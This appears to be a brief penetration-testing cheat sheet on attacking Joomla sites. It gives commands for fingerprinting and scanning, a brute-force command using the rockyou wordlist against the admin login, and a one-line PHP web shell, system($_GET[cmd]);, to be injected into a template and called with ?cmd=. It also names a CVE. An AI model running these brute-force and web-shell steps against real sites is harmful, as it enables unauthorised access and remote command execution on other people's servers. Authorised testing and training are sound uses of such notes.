Joomla

Introduction

Joomla | HackTricks

Enumeration

Footprinting:

curl -s http://<url> | grep Joomla

Automated Scan:

droopescan:

droopescan scan joomla --url http://<url>

JoomlaScan:

Requires Python 2.7 to run

sudo python2.7 -m pip install urllib3
sudo python2.7 -m pip install certifi
sudo python2.7 -m pip install bs4
python2.7 joomlascan.py -u http://<url>

Attacking Joomla

Login Bruteforce:

There is no default password. Can only bruteforce for weak / common password: ajnik/joomla-bruteforce: Joomla login bruteforce (github.com)

sudo python3 joomla-brute.py -u http://<url> -w /usr/share/wordlists/rockyou.txt -usr admin

Code Execution:

Requires Admin access. Inject this into a template (on the bottom left under Configuration)

system($_GET[cmd]);

  • Then visit the php page with ?cmd=<command>

Known Vulnerabilities:

  • Version 3.9.4 - CVE-2019-10945

Last updated